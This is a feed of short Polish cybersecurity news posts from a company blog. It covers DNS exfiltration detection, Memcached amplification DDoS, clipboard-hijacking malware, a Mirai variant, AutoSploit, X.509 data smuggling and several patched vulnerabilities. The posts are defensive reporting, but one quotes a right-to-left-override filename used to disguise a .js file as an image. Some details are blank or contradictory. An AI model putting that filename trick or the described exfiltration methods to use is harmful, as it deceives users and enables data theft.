Autorzy artykułu zwracają uwagę, że większość analizatorów ruchu nie sprawdza dokładnie ruchu tego typu. Patrzą one tylko na reputacje nazwy serwera domenowego i zwrotnego adresu IP. Czy to może oznaczać problem? Dla firm, które nie wiedzą o problemie z pewnością tak. Ale są sposoby, aby sobie z tym poradzić. Bo do wykrycia „ukrytego” wycieku danych wystarczy klika narzędzi i odpowiedni skrypt.

Przykładowa kradzież poprzez DNS

W pierwszym z przykładów jest użyte narzędzie dns-exfiltration (plik przed wysłaniem jest dzielony na bloki i kodowany w base64). Gdy atakujący kontroluje lokalny serwer domenowy może podmienić te dane na swój złośliwy kod. W ten sposób może wysyłać niewłaściwe zapytania do serwera domenowego. Tym samym narusza standardy RFC dla DNS (RFC-962, RFC-1123).

Innym przykładem jest użycie narzędzi dnscat2 (w porównaniu do dnscat umożliwia podmianę prefiksu) Przeanalizowane są też WTimerAT (złośliwy program do infekcji plików) i Ismdoor (trojan) który nie korzysta z rekordów TXT – korzysta z zapytań DNS AAAA.

Jak wykryć ukryty wyciek danych

  1. Zlicz subdomeny w domenach, szukaj nietypowych, większych niż średnia wartości.
  2. Dowiedz się czy liczba zapytań z danej domeny mieści się w średniej.
  3. Upewnij się czy nazwy i inne cechy subdomen – czy wyglądają na losowe, czy raczej na wygenerowane sztucznie i powtarzalne.
  4. Sprawdź zapytania, które otrzymuje DNS – czy nazwy domen i subdomen nie zawierają nietypowych/nieprawidłowych znaków.
  5. Bądź pewny czy serwer nazw domenowych jest używany przez wszystkie/większość komputerów w organizacji.

Źródło: Fidelis Threat Research

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Deep Fake Video wśród nowych trendów

Deep Fake Video a problem dezinformacji

Problem dezinformacji jest coraz szerzej poruszany zarówno w mediach, w świecie osób zajmujących się bezpieczeństwem IT oraz wśród polityków. Dawne “farmy trolli” przestają koncentrować się tylko na “hejtowaniu” (wpisywaniu negatywnych komentarzy pod publikacjami). Obecnie zaczynają destrukcyjnie wpływać na całe mechanizmy społeczne działające w przestrzeni wirtualnej. Do tych celów wykorzystuje się np. zmodyfikowane zdjęcia, lub też treści ilustruje się zdjęciami zupełnie nie powiązanymi.

Deep Fake Video – nowy trend

Nowym trendem w tworzeniu nieprawdziwych informacji stają się sfałszowane filmy. Stało się to możliwie dzięki rozwoju technologii (bardziej rozbudowane programy dostępne nawet za darmo w sieci).  Wpływ na to ma także upowszechnianie się tego typu informacji w Internecie. Nie dziwi więc fakt, że pojawiło się ostatnio bardzo ciekawe opracowanie na ten temat. Na blogu Lawfare pojawił się artykuł A Looming Crisis for National Security, Democracy and Privacy? autorstwa Roberta Chesneya oraz Danielle Citron.

Autorzy podkreślają, że szczególnie osoby publiczne mogą być zmuszane do pozbywania się resztek prywatności (np. publikując swoją historię przemieszczania się bazując na geolokalizacji lub telefonach komórkowych). Wszystko po to, by udowadniać, że sytuacje pokazywane na podrobionych nagraniach były nieprawdziwe.

Źródło: LAWFARE 

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Podliczanie strat po NotPetya

Atak NotPetya w czerwcu 2017 jest określany jako najdroższy cyberatak w historii. Warto zaznaczyć, że Stany Zjednoczone, Wielka Brytania i Australia jednoznacznie wskazały już kraj, z którego atak pochodził.

Niektóre z zaatakowanych podmiotów wprost podawało wielkość strat związanych z tym atakiem. W przypadku niektórych w nich świat IT praktycznie na bieżąco obserwował zmagania dotyczące odtwarzania działalności. Zmagania innych pozosawały w cieniu.

NotPetya kosztowała Naunce Communication 98 milionów dolarów

Przy okazji podsumowania roku finansowego należy teraz spodziewać się kolejnych informacji o rzeczywistych kosztach cyberincydentów. Amerykańska firma Naunce Communication właśnie podała, że koszty przywrócenia działalności po ataku wyniosły ją 98 milionów dolarów.

Z niecierpliwością oczekujemy na raporty podzumowujące globalne straty powstałe w wyniku tego jednego ataku.

Źródło: CyberScoop

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Exim – Poważna podatność

E​xim – bardzo popularny serwer pocztowy – kilka miesięcy temu poinformował o luce umożliwiającej 1-bajtowy atak Buffer Overflow dotyczący dekodowania base64. Luka ta doczekała się exploita i jest masowo wykorzystywana przez przestępców. Ocenia się, że podatnych było ok. 400 000 sewerów. Dlaczego aż tyle? Znaczna część administratorów nie potraktowała poważnie zagrożenia 1-bajtowym przepełnieniem i nie wykonała niezbędnych aktualizacji. A podatne są wszystkie wersje Exim w wersjach 4.90 i starszych.

Jak sobie rozwiązać problem na serwerach Exim

Wystarczy wgrać aktualizacje 4.90.1 lub nowszą. Łata oczywiście jest dostępna od dawna.

Źródło: Devcore 

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Raport FTC – Mobile Security Updates: Understanding the Issues

A​merykańska Federalna Komisja Handlu (ang. Federal Trade Commission – FTC) opublikowała raport Mobile Security Updates: Understanding the Issues. Podsumowuje on to, co wiadomo o bezpieczeństwie telefonów komórkowych. Dokument porusza problemy niezałatanych luk, długich czasów oczekiwania na łatki bezpieczeństwa, niejasne zasady wsparcia, techniczna trudność podczas aktualizacji i wiele, wiele więcej.

Raport FTC nie zostawia suchej nitki zarówno na producentach, jak i operatorach dystrybujących własne kompilacje oprogramowania pod urządzenia mobilne.

Warto przeczytać dokument ze względu na jego kompleksowość. Możliwe też, że na jego podstawie rozpocznie się proces porządkowania zagadnienia bezpieczeństwa telefonów komórkowych

Źródło: Raport Mobile Security Updates: Understanding the Issues 

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Weryfikacja haseł z HaveIBeenPwned

Serwis HaveIBeenPwned został wzbogacony o nową funkcjonalność. Do tej pory można było z niego korzystać do weryfikacji pojedynczych adresów e-mail na obecność w bazie danych. Można też było ściągnąć bazy SHA1 ujawnionych haseł i zweryfikować, czy wygenerowane przez nas hasło jest „znane” – czy było wcześniej wykorzystywane przez kogoś, kto je utracił.

Od kilku dni istnieje nowa możliwość weryfikacji. Wykorzystuje ono dedykowane API i od razu sprawdza, czy wpisywane przez nas w webaplikacji hasło nie jest już „publicznie” znane.

HaveIBeenPwned – weryfikacja po pierwszych znakach

Aby nie narażać się na zarzut gromadzenia haseł rozwiązanie funkcjonuje w taki sposób, że po wpisaniu hasła w aplikację przesyłane są wyłącznie pierwsze znaki skrótu. W odpowiedzi użytkownikowi wyświetlane są wszystkie obecne w bazie SHA1 i może on samodzielnie sprawdzić dalszą celowość jego zastosowania.

Źródło: HaveIBeenPwned

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Memcached UDP DDoS – opis i rekomendacje

Specjaliści z Arbor Networks opublikowali opis i rekomendację na temat ataku DDoS typu UDP reflection/amplification przeprowadzanego z wykorzystaniem serwerów z uruchomionym systemem cache’owania Memcached. Specyfika tego rozwiązania (brak wbudowanych zabezpieczeń) powoduje dużą podatność na ataki wolumetryczne. Dlatego ten konkretny system nie powinien być wystawione do sieci publicznej. Przekonali się tym administratorzy GitHuba, którzy musieli zmierzyć się z atakiem o sile 1,35 Tbps.

Gdzie wykorzystuje się rozwiązania Memcached

Duża liczba serwerów – głównie w hostingu, rozwiązaniach chmurowych czy IaaS – korzysta z Memcached w celu zwiększenia wydajności aplikacji webowych. To czyni je podatnymi na ten rodzaj ataku. Sytuacja jest o tyle niepokojąca, że dostępnych z internetu serwerów korzystających z Memcached jest naprawdę dużo. Według raportu Shodan.io na dzień 27.02 było to ponad ponad 93 000 urządzeń.

Jak przebiega atak DDoS typu UDP z wykorzystaniem Memcached

Sam atak przebiega typowo – do podatnych serwerów wysyłane są pakiety z zespoofowanym IP, następnie serwery generują odpowiedzi, które kierowane są do docelowego “odbiorcy” ataku. Domyślnie Memcached działa na porcie 11211 (TCP i UDP), więc podstawowym zaleceniem jest zablokowanie dostępu do tych portów z internetu. Zaobserwowane m.in. przez Cloudflare ataki mają bardzo duży współczynnik amplifikacji, sięgający ponad 50 000. Oznacza to, że na każdy wysłany przez atakującego bajt generowana jest odpowiedź o wielkości 50KB (czyli 50 000 razy większa).

Rekordowy DDoS o sile  1,35Tbps (przy 126,9 milionach pakietów na sekundę)

28 lutego o sile takiego ataku przekonali się administratorzy popularnego GitHuba, który tylko dzięki szybkiemu przełączeniu na zewnętrzną usługę antyDDoS był niedostępny jedynie przez kilka minut. Wolumen ruchu w szczycie ataku sięgnął aż 1,35Tbps (przy 126,9 milionach pakietów na sekundę). Takiego ataku nie da się odeprzeć bez pomocy specjalistów.

Jeśli chcesz dowiedzieć się wiec o tym ataku, sprawdź informacje na:

Źródło: Arbor Networks

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Kopiujesz adres swojego konta – Evrial je kradnie

Grupa badaczy ElevenPaths wykryła nowe, bardzo groźne złośliwe oprogramowanie o roboczej nazwie „Evrial”. Gdy już znajdzie się na naszym komputerze, może posłużyć do kradzieży naszych pieniędzy wykorzystując naszą nieuwagę.

Jak działa Evrial

Jeżeli przestępcom uda się zainstalować ten program na naszym komputerze, to w tle zaczyna działać  proces „567.exe” . Jest opisany jako „Technical Support Enivroment”… a my nie dostrzegamy żadnych zmian w funkcjonowaniu systemu. Do czasu… Jeżeli klikamy „kopiuj” lub „wytnij” to zaznaczony tekst/plik trafia do schowka. Przebywa tam, aż do momentu naciśnięcia „wklej” lub skopiowania innego tekstu. „Evrial” analizuje zawartość naszego schowka poszukując adresu portfela bitcoin-owego. Jeżeli taki trafi do schowka, to jest podmieniany na adres przestępców. Atakujący liczy na to, że większość użytkowników przed wykonaniem transakcji kopiuje adres portfela do schowka (z maila, strony). Jako adres do transakcji bez weryfikacji czy skopiowany adres i ten, który wychodzi po naciśnięciu „wklej” to faktycznie ten sam adres.

Film prezentujący mechanizm ataku można obejrzeć pod na YouTube.

Badacze wskazują na możliwość wykorzystania złośliwego programu nie tylko do kradzieży kryptowaluty. Wykorzystywany jest również w wielu innych zadań np.: kradzież haseł, numerów kont bankowych, poufnych danych itd.

Źródło: Security Affairs 

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

OMG – Mirai z funkcją proxy

Specjaliści z FortiGuard Labs (Fortinet) zamieścili na blogu analizę nowego wariantu słynnego Mirai (użytego m.in. do ataków DDoS), który otrzymał nazwę OMG. Ich duże podobieństwo zostało ustalone poprzez porównanie obecnych w tej wersji kodu ciągów “/bin/busybox OOMGA” i”OOMGA: applet not found.” do oryginalnego “bin/busybox MIRAI” i “MIRAI: applet not found”. To nie pierwsza mutacja tego rozwiązania. Wcześniej znaczące podobieństwo odkryto także w wersjach o nazwach Okiru/Satori czy Masuta.

OMG czyli rozbudowana wersja Mirai

Badany kod został wzbogacony o funkcję serwera proxy, przy zachowaniu poprzedniej funkcjonalności (moduły attack, killer i scanner). Po uruchomieniu modułów następuje komunikacja urządzenia z serwerem C&C, skąd otrzymywane są instrukcje jak urządzenie ma być użyte (0 – serwer proxy, 1 – atak, >1 – zakończenie połączenia). W przypadku roli serwera proxy generowane są dwa randomowe porty (http_proxy_port oraz socks_proxy_port), których numery są przekazywane do C&C. Następnie dopisywane są reguły firewalla, mające na celu otwarcie ruchu na wskazanych portach. OMG jako serwer proxy wykorzystuje opensource’owe rozwiązanie 3proxy.​

Źródło: Fortinet

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Departament Energii USA powołuje CESER

Rząd USA powołuje nowe biuro w Departamencie Energi ds. Bezpieczeństwa Cybernetycznego, Bezpieczeństwa Energetycznego i Reagowania w sytuacjach kryzysowych CESER (Office of Cybersecurity, Energy Security, and Emergency Response). Krok ten jest wynikiem coraz większego zagrożenia atakiem cybernetycznym. Władze USA od maja 2017 roku ostrzegają przed możliwością jego wystąpienia. Co więcej – uważa się, że sieci energetyczne już od dawna są penetrowane przez potencjalnych atakujących.

CESER jako odpowiedź na realne zagrożenia

Amerykanie obawiają się ataków podobnych do tych które wystąpiły na Ukrainie w 2015 roku. Istotny problem polega na tym, że skuteczny atak na jedną elektrownię spowoduje efekt domina i paraliż dużej części kraju. To całkiem realny scenariusz szczególnie w okresie letnim, gdzie zapotrzebowanie na energie znacząco rośnie.

Wzrost wydatków na IT i cyberbezpieczeństwo

CESER ma otrzymać łączne dofinansowanie w wysokości 96 milionów USD. Jednocześnie cała administracja USA, chce zwiększyć wydatki na IT i cyberbezpieczeństwo o 5,2 procenta, do 80 miliardów dolarów.

Źródło: WeLiveSecurity 

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Raport o grupie APT37 (Reaper)

FireEye opublikował ciekawy raport dotyczący działalności grupy APT37 (Reaper), prawdopodobnie związanej z władzami Korei Północnej. Przeprowadzona analiza aktywności tej organizacji wskazuje, że działalność tej grupy stale się rozszerza. Wykorzystuje ona luki w zabezpieczeniach typu zero-day CVE-2018-4878 czy ataki z wykorzystaniem wiper malware (rodzaj szkodliwego oprogramowania nakierowany na wymazywanie zawartości np. dysków twardych). Raport wskazuje także, iż grupa prowadziła także precyzyjne ataki socjotechnicznych (spear phishing).

O działalności APT37

O samej grupie niewiele wiadomo (co jest normą przy tego typu organizacjach powiązanych z rządami państw). Specjaliści z FireEye uważają, że działalność tej organizacji była też przypisywana grupom takim jak Scarcruft czy Grupa 123.  Wiadomo natomiast, że jej aktywność koncentruje się na Korei Południowej, Wietnamie, Japonii i Bliskim Wschodzie.

mapa aktywności grupy APT37
Zasięg działalności grupy – APT37 (Reaper): The Overlooked North Korean Actor

 

Źródło: FireEye

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Czy darmowy VPN od Facebook zadba o Twoją prywatność

Facebook zaczął rozpowszechniać i zachęcać do korzystania z darmowego VPN. Jego twórcą była izraelska firma Onavo, od 2013 roku część tego potentata społecznościowego.

Twórcy zachęcają do korzystania z tej konkretnej aplikacji. Według opisu ruch generowany przez użytkownika do Internetu będzie szyfrowany. To zapewni użytkownikowi większą prywatność.

Ruch VPN przez serwery Facebook

Korporacja nie wspomina, że cały szyfrowany ruch będzie przechodził przez serwery należące do Facebook. Co więcej – cała aktywność będzie zapisywana (i prawdopodobnie analizowana) na serwerach firmy.

Źródło: HackRead

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Blokowanie reklam po nowemu w przeglądarce Chrome

Blokowanie reklam to nowa funkcjonalność w przeglądarce Chrome. Polega ona na nie wyświetlaniu tych, które zostały zaklasyfikowane do jednej z 12 kategorii. Uznane przez specjalnie powołane stowarzyszenie ‘Coalition for Better Ads’ jako niepożądane i nieakceptowane przez użytkowników Internetu. Gdy Chrome będzie skierowany na stronę nie spełniającą standardów ‘dobrej reklamy’, wtedy wszystkie skojarzone z reklamami odwołania (url-e) z tej strony do skryptów Java lub obrazków będą blokowane.

EasyList – filtr dobrej reklamy dla przeglądarki Chrome

Identyfikacja czy link jest skojarzony z reklamami odbywa się na podstawie filtrów opisanych w formie publicznie dostępnych reguł EasyList. Użytkownik ma w każdej chwili możliwość zdjęcia blokady reklam dla danej strony. Właściciel strony z kolei może zapoznać się z raportem zgodności swojej strony ze standardem dobrej reklamy. Może także zlecić ponowne sprawdzenie po ewentualnych poprawkach. Strony nie spełniające standardów przez dłużej niż 30 dni będą blokowane.

Niektórzy tłumaczą w/w działania Google’a i innych członków Stowarzyszenia jako metodę ochrony zysków z reklam. Wielu użytkowników korzysta z ad-blokerów lub w ogóle nie wchodzi na pewne strony właśnie z powodu natrętnych reklam.

Źródło: Chromium Blog 

 

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Urządzenia Apple zagrożone – litery mogą je ‘zabić’

​Okazuje się, że jedna litera z alfabetu Telugu używanego w Indiach, może spowodować poważne problemy w urządzeniach firmy Apple. Próba wyświetlenia specyficznego znaku powoduje,że iPhone, iPad czy Mac podczas jego wyświetlenia w różnych aplikacjach (włącznie z iMessage, sms, WhatsUp, Gmail, Facebook Messenger) restartują w nieskończoność urządzenie w całości lub tylko daną aplikację.

Restart aplikacji jest standardową procedurą w przypadku poważnej awarii. W przypadku braku usunięcia przyczyny problemu proces ten się powtarza. W niektórych przypadkach można sobie poradzić przez spowodowanie przesunięcia ‘litery śmierci’ poza wyświetlany obszar (np. przez dosyłanie kolejnych wiadomości spychających z ekranu starsze) a następnie usunięcie. Apple powtierdził, że przygotował już odpowiednie poprawki, które są w fazie testów.

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Przedstawiciele firm telko na spotkaniu w UKE

UKE – Rozmowy o bezpieczeństwie 5G

16 lutego odbyła się organizowana przez Urząd Komunikacji Elektronicznej (UKE) dyskusja o strategii wdrażania technologii 5G. Uczestniczyli w niej przedstawiciele branży telekomunikacyjnej, regulatora i innych zainteresowanych stron. Tematem przewodnim było bezpieczeństwo nowych technologii w kontekście Przemysłu 4.0.

Było to ważne spotkanie, za które należy podziękować prezesowi UKE. To właściwy początek poważnej dyskusji o wdrożeniu 5G w Polsce – powiedział Nikodem Bończa Tomaszewski, prezes zarządu EXATEL.

EXATEL jest pierwszą polską firmą, która przetestowała technologię 5G w przestrzeni publicznej w ramach międzynarodowego projektu 5G RAPID. To także jeden z kilku projektów badawczo-rozwojowych, którymi zajmuje się polski operator.

Cyber blog

0-day RCE w protokole P2P Bitmessage

Twórcy protokołu P2P Bitmessage poinformowali o odkryciu krytycznej luki w PyBitmessage w wersji 0.6.2 dla systemów Linux, Mac i Windows.

Podatność umożliwia atakującemu zdalne wykonanie kodu skryptu lub otwarcie reverse shella i dostęp do wszystkich plików, w tym do portfeli kryptowalut.

Również Peter Šurda – core developer tego protokołu – padł ofiarą ataku, o czym poinformował na Twitterze.

Twitter Peter Surda

Rekomendacja względem luki RCE w protokole P2P Bitmessage

Najważniejsze to szybki upgrade PyBitmessage do wersji lub downgrade do . Dodatkowo zalecana jest zmiana haseł na potencjalnie skompromitowanych komputerach i wygenerowanie nowych kluczy do programu.

To kolejny 0-day, o którym ostatnio słyszmy. Ostatnio pisaliśmy także o przypadku Adobe Flash Playera.

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Dane osobowe dzieci na Dream Market

Na darknetowym forum Dream Market (jedno z większych Torowych targowisk), pojawiły się na sprzedaż dane osobowe wielu dzieci.

W ramach oferty sprzedający oferuje takie informacje jak: numer ubezpieczenia społecznego dzieci (SSN – Social Security numer), datę urodzin wraz z nazwiskiem panieńskim matki. W artykule nie podano ilu osób dotyczy ten wyciek ani w jakim wieku są te osoby. Dostęp do tych danych został wyceniony na 300$ w bitcoinach.

Do czego można użyć dane z Dream Market

Tego typu informacje mogą okazać się bardzo cenne dla przestępców. Dane personalne „czystych” osób można już teraz wykorzystać w działalności przestępczej. Osoby cierpliwe mogą te dane wykorzystać dopiero za kilkanaście lat, gdy ich właściciele będą pełnoletni. Za ich pomocą można bowiem zaciągać zobowiązania kredytowe lub włamywać się na konta bankowe ich właścicieli.

Tego typu wycieki nie są rzadkością. Nie tak dawno głośno było o wycieku danych brytyjskich firm do Dark Web’u, o którym również pisaliśmy na naszym Cyber Blogu.

Źródło: Security Affairs

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

AutoSploit – nowe zagrożenie dla IoT

Nowe narzędzie AutoSploit to narzędzie automatyzujące ekspoloitację usług udostępnionych w Internecie. Skrypt został napisany w Pythonie z wykorzystaniem API Shodana oraz Metasploit. Może być wykorzystany przez niedoświadczonych “badaczy” bezpieczeństwa do testowania błędów w oprogramowaniu urządzeń podłączonych do sieci Internet.

Jak działa AutoSploit

W skrócie narzędzie to wyszukuje za pomocą Shodana podatne usługi, a następnie uruchamiane są odpowiednie moduły Metasploit. Ich celem jest uzyskanie Reverse TCP Shell lub nawet sesji Meterpretera.

Łatwość instalacji oraz obsługi spowodowała, iż wokół narzędzia pojawiło się wiele opinii ekspertów bezpieczeństwa. Wskazują one, iż AutoSploit przyczynia się do znacznie większej liczby ataków na rozwiązania w szczególności IoT. Wynika to z faktu, iż bezpieczeństwo w IoT nie jest priorytetem.

Nie mniej idea wykorzystania Shodana oraz Metasploita nie jest nowa i jest od dawna znana jest osobom zajmującym się testowaniem bezpieczeństwa.

Źródło: GitHub

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

0-day w popularnym komunikatorze Telegram

Telegram to jeden najpopularniejszych i najlepszych komunikatorów na świecie. Lista zalet jest długa: darmowy, dostępny na wszystkich platformach (w tym Windows 8),  praktyczna synchronizacja, ale również bezpieczeństwo. Posiada tryb „secret chat”, podczas którego wiadomości nie są szyfrowane przez serwer a bezpośrednio przez rozmawiających (end-to end). Ten komunikator często wskazywany jest jako jedyna realna konkurencja dla Signal-a (który również miewa problemy z podsłuchiwaniem, o czym pisaliśmy wcześniej). Tym bardziej zaskakuje nowa podatność odkryta w tym komunikatorze.

Pisanie “od prawa do lewa” wytrychem do Telegram

Okazało się, że wystarczyło wykonać prosty trick z nazwą pliku a mówiąc dokładnie użyć trybu pisania „od prawa do lewa”. Znak kodowy U+202E określa, że mamy do czynienia z językiem (np.: arabski) który należy czytać od lewej do prawej. Co za tym idzie .sj oznacza js. Wykorzystali to atakujący nazywając plik “photo_high_re*U+202E*gnp.js”, co z kolei wyświetla się jako photo_high_resj.png. W ten sposób było możliwe wysyłanie użytkownikom aplikacji Telegram pod przykrywką .png złośliwy kod .js . Przestępcy błyskawicznie zaczęli wykorzystywać tę podatność zarówno do kopania wirtualnych walut, szyfrowania danych jak i kradzieży informacji.

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Cyber zniszczenia na olimpiadzie w Pyeongchang

Olimpiada w Pyeongchang zaczyna przypominać cyberigrzyska. Wiadomo już, że awaria systemów w trakcie ceremonii otwarcia, była spowodowana wrogimi działaniami cyberprzestępców. Uniemożliwiła ona prawidłowe zweryfikowanie wejściówek znacznej liczbie gości. Przywracanie systemów do pełnej sprawności zajęło 12 godzin. Organizatorzy twierdzą, że udało im się zidentyfikować sprawców. Niemniej zdecydowano się nie ujawniać ich tożsamości… choć Rosja kategorycznie zaprzeczyła wszelkim pomówieniom, podkreślając brak jakichkolwiek dowodów.

Nie taki zwykły atak w Pyeongchang

Analiza próbek wskazuje, że kampania była bardziej zaawansowana niż pierwotnie sądzono. Celem nie była kradzież informacji, ale wprost sianie zamieszania i zniszczenia. Oprogramowania m.in. niszczyło shadow copy, kasowało logi, próbowało wykorzystać PxExec oraz WMI aby jeszcze głębiej spenetrować zaatakowaną sieć. Bardzo ciekawą analizę tych przypadku przedstawił zespół Talos w Cisco.

Źródło: http://blog.talosintelligence.com/2018/02/olympic-destroyer.html

PS. Ciekawą analizę prezentuje także Zaufana Trzecia Strona w materiale Znamy szczegóły ataku na Igrzyska Olimpijskie – i są całkiem ciekawe

Cyber blog

Błędy pamięci w p7zip pozwalają na zdalne wykonanie kodu

Ujawniono podatności w oprogramowaniu p7zip i 7zip. Pozwalają one na zdalne wykonanie kodu otwierając specjalnie przygotowanego archiwum rar lub zip.

Podatność polega na przepełnieniu pamięci procesu tzw. sterty (ang. heap overflow). Jest to możliwe, gdyż brakuje sprawdzania długości kopiowanego buforu w jednej z wew. funkcji aplikacji. W konsekwencji doprowadza to do wykonania kodu na komputerze ofiary.

Wersje oprogramowania dla OS Windows nie są kompilowane z flagami NXCOMPAT i DYNAMICBASE (włączenie ASLR), a mechanizm DEP włączony jest tylko na wersjach 64 bitowych Windows (lub Windows 10 x86). To oznaza, że zdalne wykonanie kodu staje się sprawą jeszcze prostszą.

Podatność ta została poprawiona w wersji 18 (aktualnie 
beta).

Źródło: https://landave.io/2018/01/7-zip-multiple-memory-corruptions-via-rar-and-zip/

Cyber blog

Przeglądarka www oknem do Twoich danych

Dla bezpieczeństwa większość firm blokuje niestandardowe porty w przeglądarce. Jednocześnie pozwala swoim pracownikom łączyć się z internetem za pośrednictwem tylko niezbędnych i typowych programów takich jak np.: przeglądarka czy klient poczty. Niestety założenie, że przeglądarka stron www służy tylko do przeglądania stron www było dobre …. kilkanaście lat temu. Dzisiaj jest to uniwersalne narzędzie pozwalające na praktycznie każde działanie i komunikację.

Dobrym przykładem jest firma Domotz, które oferuje usługę enkapsulacji protokołu zdalnego pulpitu działającego na porcie 3000 (i innych) na port 443 i wyświetla go w oknie przeglądarki. Oprócz typowej usługi VNC przeniesionego do portu 443 Domotz oferuje również szeroki zakres monitoringu urządzeń, ochrony przed podłączenie do sieci nieznanych urządzeń, automatyczny alarm w przypadku wyłączenia monitorowanego urządzenia itp. Jednocześnie w przypadku braku rozszywania SSL-a otwiera to olbrzymią podatność umożlwiającą prostą i dostępną (nawet dla osoby posiadającą tylko podstawowe umiejętności informatyczne) metodę sprawnego przesyłania danych na zewnętrzny serwer. Dzięki enkapsulacji dowolnego protokołu w https możliwe np.: niczym nie skrępowany transfer bazy danych na zewnętrzny serwer.

Jak się bronić

Jedyną skuteczną metodą obrony przed taką sytuacją wydaje się być rozszywanie protokołu SSL. Bez tego dział bezpieczeństwa będzie ślepy i głuchy. A ryzyko dla zarządów (szczególnie w perspektywie RODO) nieustannie rośnie.

Źródło: https://www.domotz.com

Cyber blog

Nowa darmowa wersja deasemblera IDA

Bezpłatna niekomercyjna wersja deasemblera IDA 7.0

​Firma Hex-Rays udostępniła do bezpłatnego pobrania niekomercyjną wersję deasemblera IDA 7.0 . Wersja ta nie posiada wsparcia dla wielu procesorów i formatów. Jednak najbardziej popularne binarki 32 lub 64-bitowe na procesorach Intel będzie przy można z użyciem tego narzędzia jak najbardziej analizować.

Porównanie wersji komercyjnej IDA, nie mającej już takich ograniczeń jak wersja darmowa, z innymi pakietami oprogramowania do analizy binarek znajduje się pod linkiem:

https://reverseengineering.stackexchange.com/questions/1817/is-there-any-disassembler-to-rival-ida-pro

Źródło: https://www.hex-rays.com/products/ida/support/download_freeware.shtml

Cyber blog

Zbrodnia doskonała, czyli przemyt w ruchu X.509

Zbrodnia doskonała, czyli przemyt w ruchu X.509

Od tysięcy lat ludzie udoskonalają techniki przemytu. W XXI w., gdy informacja jest cenniejsza od złota, techniki jej przemycenia również wzrosły na znaczeniu. Specjaliści z Fidelisa odkryli nowy kanał przemytu informacji w certyfikatach TLS X.509, która nie pozostawia żadnych śladów. Sekret tkwi w tym, że specjaliści od bezpieczeństwa analizują ruch sieciowy. Co jednak, jeżeli do ruchu nie dojdzie? Jak to możliwe? Wyobraźmy sobie rutynowe spotkanie dwóch celników na granicy, podczas którego wymieniają się pakunkami, jednak żaden z nich nie przekracza granicy, a co za tym idzie nie powstaje ruch graniczny, który mógłby zostać zarejestrowany i wzbudzić podejrzenia.

Analogicznie Fidelis przedstawił metodę przemycania informacji podczas negocjowania parametrów bezpiecznej sesji (SSL handshake) w dobrze znanych certyfikatach TLS X.509. Wystarczy w przestrzeni certyfikatu przygotowanej do przekazania hash-u (MD5, SHA1, SHA256, SHa 384, SHA 512) umieścić złośliwe informacje. Serwer automatycznie zapisuje dane na dysku, ale ponieważ połączenie nie jest nawiązywane, z technicznego punktu widzenia żaden ruch nie jest rejestrowany. W prezentacji przedstawionej przez naukowców w ten sposób zostało przesłane popularne narzędzie hackerów Mimikatz. Fidelis, będąc krok przed atakującym, przygotował już reguły YARA, które wykrywają  anomalie w certyfikatach X.509 i blokują ten kanał przemycania informacji, zanim na dobre zostanie użyty przez przestępców.

Źródło: https://www.fidelissecurity.com/threatgeek/2018/02/exposing-x509-vulnerabilities

Cyber blog

0-day w Adobe Flash Player

Specjaliści z Koreańskiego CERT-u opublikowali podatności (CVE-2018-4878) w Adobe Flash Player dotyczące wszystkich wersji, w tym najnowszej 28.0.0.137 (wydana w styczniu 2018).

Exploit w Adobe Flash Player może być zawarty w Microsoft Office lub stronie internetowej i może umożliwić przejęcie systemu przez atakującego. Obecnie nie ma poprawki, prawdopodobnie pojawi w tym tygodniu. Jednym z zaleceń jest wyłączenie lub odinstalowanie aplikacji.

Źródło: SANS ISC InfoSec Forums

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Firma RSA udostępniła darmowy semi SIEM

Firma RSA udostępniła za darmo SIEM (do użytku domowego/nie komercyjnego) oprogramowanie RSA NetWitness Investigator Freeware.

Jest to uproszczona (z innym GUI) wersja systemu SIEM (Security Information and Event Management) firmy RSA o nazwie Netwitness Suite. Umożliwia on zbieranie i analizę pakietów sieciowych oraz istotnych dla bezpieczeństwa danych z logów. Umożliwia również korelację zdarzeń oraz identyfikację wzorców zachowań i metadanych wskazujących na ryzyko wystąpienia zagrożenia bezpieczeństwa. Wraz z pakietem możliwe jest zaimportowanie gotowych reguł, które pozwalają na wygenerowanie więcej niż 200 alertów bezpieczeństwa.

Oprogramowanie może być zainstalowane na 64-bitowych wersjach Windows i umożliwia podpięcie do 25 lokalnych koncentratorów. Każdy może zbierać/przetwarzać do 2GB pakietów. Nie ma ograniczeń czasowych na używanie oprogramowania.

Informacje na temat oprogramowania SIEM

Źródło: https://information.rsa.com/netwitness-investigator-freeware.html?scid=70170000001cTNL

Cyber blog

Wycieki danych z gry Sonic na niezweryfikowane serwery

